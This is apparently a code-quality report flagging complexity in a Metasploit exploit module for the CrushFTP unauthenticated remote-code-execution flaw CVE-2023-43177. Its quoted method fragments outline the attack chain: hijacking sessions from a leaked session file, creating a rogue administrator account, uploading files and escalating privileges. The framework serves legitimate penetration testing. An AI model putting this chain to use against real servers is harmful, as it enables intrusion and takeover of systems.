File crushftp_rce_cve_2023_43177.rb
has 585 lines of code (exceeds 250 allowed). Consider refactoring. Open
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
Method exploit
has a Cognitive Complexity of 35 (exceeds 5 allowed). Consider refactoring. Open
def exploit
admin_creds = nil
is_windows = nil
loop do
print_status('Downloading the session file')
Cognitive Complexity
Cognitive Complexity is a measure of how difficult a unit of code is to intuitively understand. Unlike Cyclomatic Complexity, which determines how difficult your code will be to test, Cognitive Complexity tells you how difficult your code will be to read and comprehend.
A method's cognitive complexity is based on a few simple rules:
- Code is not considered more complex when it uses shorthand that the language provides for collapsing multiple statements into one
- Code is considered more complex for each "break in the linear flow of the code"
- Code is considered more complex when "flow breaking structures are nested"
Method do_priv_esc_and_check_windows
has 78 lines of code (exceeds 25 allowed). Consider refactoring. Open
def do_priv_esc_and_check_windows(session)
vprint_status('Looking for a directory with write permissions')
writable_dir = get_writable_dir('/', session[:cookie])
if writable_dir.nil?
print_bad('[do_priv_esc_and_check_windows] The user has no upload permissions, privilege escalation is not possible')
Method initialize
has 73 lines of code (exceeds 25 allowed). Consider refactoring. Open
def initialize(info = {})
super(
update_info(
info,
'Name' => 'CrushFTP Unauthenticated RCE',
Method create_admin_account
has 63 lines of code (exceeds 25 allowed). Consider refactoring. Open
def create_admin_account(cookie, is_windows)
# This creates an administrator account with the required VFS setting for the exploit to work
admin_username = rand_text_hex(10)
admin_password = rand_text_hex(10)
user_xml = <<~XML.gsub!(/\n */, '')
Method exploit
has 50 lines of code (exceeds 25 allowed). Consider refactoring. Open
def exploit
admin_creds = nil
is_windows = nil
loop do
print_status('Downloading the session file')
Method get_session_file
has a Cognitive Complexity of 15 (exceeds 5 allowed). Consider refactoring. Open
def get_session_file
# Setting this here to be reachable by the ensure block
cookie = nil
begin
cookie = get_anon_session
Method do_priv_esc_and_check_windows
has a Cognitive Complexity of 15 (exceeds 5 allowed). Consider refactoring. Open
def do_priv_esc_and_check_windows(session)
vprint_status('Looking for a directory with write permissions')
writable_dir = get_writable_dir('/', session[:cookie])
if writable_dir.nil?
print_bad('[do_priv_esc_and_check_windows] The user has no upload permissions, privilege escalation is not possible')
Method send_query_api
has a Cognitive Complexity of 14 (exceeds 5 allowed). Consider refactoring. Open
def send_query_api(command:, cookie: nil, vars: {}, multipart: false, timeout: 20)
opts = {
'uri' => normalize_uri(target_uri.path, 'WebInterface/function/'),
'method' => 'POST'
}
Method get_session_file
has 40 lines of code (exceeds 25 allowed). Consider refactoring. Open
def get_session_file
# Setting this here to be reachable by the ensure block
cookie = nil
begin
cookie = get_anon_session
Method get_writable_dir
has a Cognitive Complexity of 12 (exceeds 5 allowed). Consider refactoring. Open
def get_writable_dir(path, cookie)
res = send_query_api(command: 'getXMLListing', cookie: cookie, vars: { 'path' => path, 'random' => "0.#{rand_text_numeric(17)}" })
xml_doc = res.get_xml_document
current_path = xml_doc.xpath('//listingInfo/path').text
if xml_doc.xpath('//listingInfo/privs').text.include?('(write)')
Method upload_file
has 32 lines of code (exceeds 25 allowed). Consider refactoring. Open
def upload_file(file_path, file_content, id, cookie)
file_size = file_content.size
vars = [
{ 'name' => 'upload_path', 'data' => file_path },
{ 'name' => 'upload_size', 'data' => file_size },
Method send_query_api
has 28 lines of code (exceeds 25 allowed). Consider refactoring. Open
def send_query_api(command:, cookie: nil, vars: {}, multipart: false, timeout: 20)
opts = {
'uri' => normalize_uri(target_uri.path, 'WebInterface/function/'),
'method' => 'POST'
}
Method check_sessions
has a Cognitive Complexity of 7 (exceeds 5 allowed). Consider refactoring. Open
def check_sessions(session_file)
valid_sessions = []
session_cookies = session_file.scan(/\d{13}_[A-Za-z0-9]{30}/).uniq
vprint_status("Found #{session_cookies.size} session cookies in the session file")
session_cookies.each do |cookie|
Method create_admin_account
has a Cognitive Complexity of 7 (exceeds 5 allowed). Consider refactoring. Open
def create_admin_account(cookie, is_windows)
# This creates an administrator account with the required VFS setting for the exploit to work
admin_username = rand_text_hex(10)
admin_password = rand_text_hex(10)
user_xml = <<~XML.gsub!(/\n */, '')
Method check
has a Cognitive Complexity of 6 (exceeds 5 allowed). Consider refactoring. Open
def check
vprint_status('Checking CrushFTP Server')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'WebInterface', 'login.html'),
'method' => 'GET'